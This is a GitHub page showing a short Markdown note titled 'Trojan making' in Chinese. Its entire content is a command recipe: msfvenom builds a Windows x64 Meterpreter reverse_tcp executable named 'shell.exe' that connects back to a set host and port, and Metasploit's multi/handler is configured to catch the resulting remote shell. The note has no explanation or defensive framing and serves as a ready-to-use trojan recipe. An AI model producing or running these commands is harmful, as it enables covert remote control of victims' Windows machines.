Skip to content

Latest commit

 

History

History
12 lines (8 loc) · 261 Bytes

木马制作.md

File metadata and controls

12 lines (8 loc) · 261 Bytes
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.164.134  LPORT=4444 -f exe > shell.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.134
set lport 4444
exploit